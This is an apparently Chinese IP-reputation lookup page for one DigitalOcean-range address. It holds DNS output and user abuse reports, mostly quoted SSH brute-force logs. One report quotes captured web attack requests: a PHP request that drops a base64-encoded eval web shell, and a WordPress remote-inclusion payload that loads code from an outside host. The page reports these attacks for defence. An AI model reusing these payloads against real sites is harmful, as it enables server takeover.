138.68.168.52 - IPInfo

基本信息:

城市(city): unknown

省份(region): unknown

国家(country): United States

运营商(isp): unknown

主机名(hostname): unknown

机构(organization): unknown

使用类型(Usage Type): unknown

用户上报:

点此参与IP信息讨论

暂无关于此IP的讨论, 沙发请点上方按钮

相同子网IP讨论:

IP	类型	评论内容	时间
138.68.168.137	attackspambots	2020-03-24T18:24:04.338629shield sshd\[1720\]: Invalid user testuser from 138.68.168.137 port 41348 2020-03-24T18:24:04.342343shield sshd\[1720\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=138.68.168.137 2020-03-24T18:24:06.326852shield sshd\[1720\]: Failed password for invalid user testuser from 138.68.168.137 port 41348 ssh2 2020-03-24T18:31:58.513381shield sshd\[3346\]: Invalid user jeanie from 138.68.168.137 port 59402 2020-03-24T18:31:58.516640shield sshd\[3346\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=138.68.168.137	2020-03-25 02:52:35
138.68.168.137	attackspambots	2020-03-24T18:07:52.907199shield sshd\[30137\]: Invalid user gy from 138.68.168.137 port 33476 2020-03-24T18:07:52.913682shield sshd\[30137\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=138.68.168.137 2020-03-24T18:07:55.128671shield sshd\[30137\]: Failed password for invalid user gy from 138.68.168.137 port 33476 ssh2 2020-03-24T18:11:50.402980shield sshd\[31146\]: Invalid user office from 138.68.168.137 port 42502 2020-03-24T18:11:50.410060shield sshd\[31146\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=138.68.168.137	2020-03-25 02:18:32
138.68.168.137	attackbotsspam	2020-03-23T15:38:43.121143abusebot-7.cloudsearch.cf sshd[19459]: Invalid user newsletter from 138.68.168.137 port 35472 2020-03-23T15:38:43.126340abusebot-7.cloudsearch.cf sshd[19459]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=138.68.168.137 2020-03-23T15:38:43.121143abusebot-7.cloudsearch.cf sshd[19459]: Invalid user newsletter from 138.68.168.137 port 35472 2020-03-23T15:38:44.916504abusebot-7.cloudsearch.cf sshd[19459]: Failed password for invalid user newsletter from 138.68.168.137 port 35472 ssh2 2020-03-23T15:47:18.433090abusebot-7.cloudsearch.cf sshd[20039]: Invalid user vix from 138.68.168.137 port 51306 2020-03-23T15:47:18.438580abusebot-7.cloudsearch.cf sshd[20039]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=138.68.168.137 2020-03-23T15:47:18.433090abusebot-7.cloudsearch.cf sshd[20039]: Invalid user vix from 138.68.168.137 port 51306 2020-03-23T15:47:20.595192abusebot-7.cloudsearch.cf s ...	2020-03-24 02:02:33
138.68.168.137	attack	Mar 12 16:58:35 lanister sshd[28250]: Failed password for invalid user paul from 138.68.168.137 port 37160 ssh2 Mar 12 17:11:50 lanister sshd[28520]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=138.68.168.137 user=root Mar 12 17:11:53 lanister sshd[28520]: Failed password for root from 138.68.168.137 port 39500 ssh2 Mar 12 17:16:49 lanister sshd[28595]: Invalid user jira from 138.68.168.137	2020-03-13 05:41:53
138.68.168.137	attackbots	Mar 4 17:26:34 hcbbdb sshd\[8947\]: Invalid user plegrand from 138.68.168.137 Mar 4 17:26:34 hcbbdb sshd\[8947\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=138.68.168.137 Mar 4 17:26:37 hcbbdb sshd\[8947\]: Failed password for invalid user plegrand from 138.68.168.137 port 53114 ssh2 Mar 4 17:35:44 hcbbdb sshd\[9933\]: Invalid user sshvpn from 138.68.168.137 Mar 4 17:35:44 hcbbdb sshd\[9933\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=138.68.168.137	2020-03-05 01:43:06
138.68.168.137	attackspam	Feb 28 23:37:06 ns381471 sshd[5202]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=138.68.168.137 Feb 28 23:37:08 ns381471 sshd[5202]: Failed password for invalid user php from 138.68.168.137 port 39826 ssh2	2020-02-29 06:46:39
138.68.168.137	attack	Feb 27 19:10:22 web1 sshd\[15937\]: Invalid user deployer from 138.68.168.137 Feb 27 19:10:22 web1 sshd\[15937\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=138.68.168.137 Feb 27 19:10:24 web1 sshd\[15937\]: Failed password for invalid user deployer from 138.68.168.137 port 38600 ssh2 Feb 27 19:17:16 web1 sshd\[16908\]: Invalid user wangxue from 138.68.168.137 Feb 27 19:17:16 web1 sshd\[16908\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=138.68.168.137	2020-02-28 13:29:17
138.68.168.137	attackspambots	Feb 11 14:48:11 nextcloud sshd\[20955\]: Invalid user sqn from 138.68.168.137 Feb 11 14:48:11 nextcloud sshd\[20955\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=138.68.168.137 Feb 11 14:48:13 nextcloud sshd\[20955\]: Failed password for invalid user sqn from 138.68.168.137 port 37670 ssh2	2020-02-11 22:39:50
138.68.168.137	attack	Invalid user vidushi from 138.68.168.137 port 50096	2020-02-02 15:32:13
138.68.168.137	attackspam	Dec 19 03:24:30 dallas01 sshd[28204]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=138.68.168.137 Dec 19 03:24:32 dallas01 sshd[28204]: Failed password for invalid user guenter from 138.68.168.137 port 60208 ssh2 Dec 19 03:29:37 dallas01 sshd[31708]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=138.68.168.137	2020-01-28 04:14:22
138.68.168.137	attackspam	Jan 24 05:52:15 vps691689 sshd[23745]: Failed password for root from 138.68.168.137 port 55866 ssh2 Jan 24 05:55:04 vps691689 sshd[23888]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=138.68.168.137 ...	2020-01-24 13:08:12
138.68.168.137	attack	Dec 27 21:42:07 cavern sshd[31147]: Failed password for root from 138.68.168.137 port 50310 ssh2	2019-12-28 05:11:14
138.68.168.137	attackbots	Dec 22 20:00:47 server sshd\[5095\]: Invalid user traub from 138.68.168.137 Dec 22 20:00:47 server sshd\[5095\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=138.68.168.137 Dec 22 20:00:49 server sshd\[5095\]: Failed password for invalid user traub from 138.68.168.137 port 44168 ssh2 Dec 22 20:06:59 server sshd\[6636\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=138.68.168.137 user=ftp Dec 22 20:07:01 server sshd\[6636\]: Failed password for ftp from 138.68.168.137 port 36478 ssh2 ...	2019-12-23 01:07:16

WHOIS信息:

DIG信息:

; <<>> DiG 9.10.3-P4-Ubuntu <<>> 138.68.168.52
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 52701
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;138.68.168.52.			IN	A

;; AUTHORITY SECTION:
.			487	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2022091400 1800 900 604800 86400

;; Query time: 74 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Wed Sep 14 21:03:53 CST 2022
;; MSG SIZE  rcvd: 106

HOST信息:

52.168.68.138.in-addr.arpa domain name pointer server.idevelopment.site.

NSLOOKUP信息:

Server:		183.60.83.19
Address:	183.60.83.19#53

Non-authoritative answer:
52.168.68.138.in-addr.arpa	name = server.idevelopment.site.

Authoritative answers can be found from:

最新评论:

IP	类型	评论内容	时间
27.19.188.237	attackspam	Jun 20 20:05:12 jarvis sshd[4579]: Bad protocol version identification '' from 27.19.188.237 port 33331 Jun 20 20:05:23 jarvis sshd[4580]: Invalid user support from 27.19.188.237 port 34337 Jun 20 20:05:25 jarvis sshd[4580]: Failed password for invalid user support from 27.19.188.237 port 34337 ssh2 Jun 20 20:05:28 jarvis sshd[4580]: Connection closed by 27.19.188.237 port 34337 [preauth] Jun 20 20:05:36 jarvis sshd[4650]: Invalid user ubnt from 27.19.188.237 port 38081 Jun 20 20:05:38 jarvis sshd[4650]: Failed password for invalid user ubnt from 27.19.188.237 port 38081 ssh2 Jun 20 20:05:39 jarvis sshd[4650]: Connection closed by 27.19.188.237 port 38081 [preauth] Jun 20 20:05:43 jarvis sshd[4652]: Invalid user cisco from 27.19.188.237 port 41744 Jun 20 20:05:45 jarvis sshd[4652]: Failed password for invalid user cisco from 27.19.188.237 port 41744 ssh2 Jun 20 20:05:46 jarvis sshd[4652]: Connection closed by 27.19.188.237 port 41744 [preauth] Jun 20 20:05:50 jarvis ssh........ -------------------------------	2019-06-22 06:22:59
36.232.0.81	attackspambots	445/tcp [2019-06-21]1pkt	2019-06-22 06:09:22
190.149.252.233	attackbots	445/tcp [2019-06-21]1pkt	2019-06-22 06:24:48
77.247.110.116	attack	SIP Server BruteForce Attack	2019-06-22 06:52:34
181.113.22.86	attackspam	37215/tcp [2019-06-21]1pkt	2019-06-22 06:31:54
185.53.88.45	attackbotsspam	\[2019-06-21 18:05:45\] SECURITY\[2312\] res_security_log.c: SecurityEvent="FailedACL",EventTV="2019-06-21T18:05:45.889-0400",Severity="Error",Service="SIP",EventVersion="1",AccountID="9011441217900519",SessionID="0x7fea9c06a3e8",LocalAddress="IPV4/UDP/192.168.244.6/5060",RemoteAddress="IPV4/UDP/185.53.88.45/51470",ACLName="no_extension_match" \[2019-06-21 18:07:25\] SECURITY\[2312\] res_security_log.c: SecurityEvent="FailedACL",EventTV="2019-06-21T18:07:25.163-0400",Severity="Error",Service="SIP",EventVersion="1",AccountID="9441217900519",SessionID="0x7fea9c16c048",LocalAddress="IPV4/UDP/192.168.244.6/5060",RemoteAddress="IPV4/UDP/185.53.88.45/57977",ACLName="no_extension_match" \[2019-06-21 18:09:00\] SECURITY\[2312\] res_security_log.c: SecurityEvent="FailedACL",EventTV="2019-06-21T18:09:00.529-0400",Severity="Error",Service="SIP",EventVersion="1",AccountID="011441217900519",SessionID="0x7fea9c3653e8",LocalAddress="IPV4/UDP/192.168.244.6/5060",RemoteAddress="IPV4/UDP/185.53.88.45/55604",ACLName="no_extensi	2019-06-22 06:20:30
177.223.49.60	attackspam	Request: "GET //administrator//webconfig.txt.php HTTP/1.1"	2019-06-22 06:25:55
80.227.12.38	attackspambots	2019-06-21T21:41:40.658808 sshd[30142]: Invalid user san from 80.227.12.38 port 47100 2019-06-21T21:41:40.674684 sshd[30142]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=80.227.12.38 2019-06-21T21:41:40.658808 sshd[30142]: Invalid user san from 80.227.12.38 port 47100 2019-06-21T21:41:42.570915 sshd[30142]: Failed password for invalid user san from 80.227.12.38 port 47100 ssh2 2019-06-21T21:43:28.402216 sshd[30157]: Invalid user zhui from 80.227.12.38 port 35978 ...	2019-06-22 06:44:35
61.228.152.237	attackbots	445/tcp [2019-06-21]1pkt	2019-06-22 06:21:41
41.232.42.75	attack	Request: "GET /?1=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo '->\|';file_put_contents($_SERVER['DOCUMENT_ROOT'].'/webconfig.txt.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));echo '\|<-'; HTTP/1.1" Request: "POST //user/register/?element_parents=account/mail/#valueajax_form=1_wrapper_format=drupal_ajax HTTP/1.1" Request: "POST //wp-admin/admin-post.php?swp_debug=load_optionsswp_url=http://52.65.39.181//wp-includes/css/css/css.csswpaa=echo "h1loo1"; HTTP/1.1" Request: "POST //wp-admin/admin-post.php?swp_debug=load_optionsswp_url=http://52.65.39.181//wp-includes/css/css/css.csswpaa=echo "h1loo1"; HTTP/1.1" Request: "GET //wp-admin/admin-post.php?swp_debug=load_optionsswp_url=http://52.65.39.181//wp-includes/css/css/css.csswpaa=echo "h1loo1"; HTTP/1.1" Request: "GET //wp-admin/admin-post.php?swp_debug=load_optionsswp_url=http://52.65.39.181//wp-includes/css/css/css.csswpaa=echo "h1loo1"; HTTP/1.1" Request: "GET //wp	2019-06-22 06:28:18
69.25.27.115	attackspam	2019/06/21 12:42:11 -- [DOS][Block][trace_route][69.25.27.115->181.29.101.11][ICMP][HLen=20, TLen=44, Type=8, Code=0] 2019/06/21 12:42:13 -- [DOS][Block][trace_route][69.25.27.110->181.29.101.11][ICMP][HLen=20, TLen=44, Type=8, Code=0]	2019-06-22 06:50:43
35.197.174.124	attackspam	2019-06-21 13:30:16 dovecot_login authenticator failed for 124.174.197.35.bc.googleusercontent.com (iBXj5Z3ie) [35.197.174.124]:54775: 535 Incorrect authentication data (set_id=info) 2019-06-21 13:30:24 dovecot_login authenticator failed for 124.174.197.35.bc.googleusercontent.com (hostnameoSzE8) [35.197.174.124]:60363: 535 Incorrect authentication data (set_id=info) 2019-06-21 13:30:35 dovecot_login authenticator failed for 124.174.197.35.bc.googleusercontent.com (6Jtt3AJl) [35.197.174.124]:61065: 535 Incorrect authentication data (set_id=info) 2019-06-21 13:30:53 dovecot_login authenticator failed for 124.174.197.35.bc.googleusercontent.com (l52ATK) [35.197.174.124]:61318: 535 Incorrect authentication data 2019-06-21 13:31:04 dovecot_login authenticator failed for 124.174.197.35.bc.googleusercontent.com (YWkPGdA) [35.197.174.124]:55092: 535 Incorrect authentication data 2019-06-21 13:31:16 dovecot_login authenticator failed for 124.174.197.35.bc.googleusercontent.com (........ ------------------------------	2019-06-22 06:38:37
176.59.110.99	attackbotsspam	445/tcp [2019-06-21]1pkt	2019-06-22 06:40:42
177.94.43.44	attackbots	8080/tcp [2019-06-21]1pkt	2019-06-22 06:23:52
79.167.38.122	attackspam	Request: "GET / HTTP/1.1"	2019-06-22 06:45:10

最近上报的IP列表

45.8.134.70	195.167.110.9	146.190.226.164	211.222.108.240
115.23.23.102	85.113.58.161	222.135.29.197	202.75.103.178
2.59.21.119	124.221.180.197	122.241.4.247	129.159.143.245
183.6.121.120	103.59.74.39	27.148.151.151	219.78.53.47
213.251.244.144	216.188.252.215	45.66.209.41	31.6.17.122

基本信息:

用户上报:

相同子网IP讨论:

WHOIS信息:

DIG信息:

HOST信息:

NSLOOKUP信息:

相关IP信息:

最新评论:

最近上报的IP列表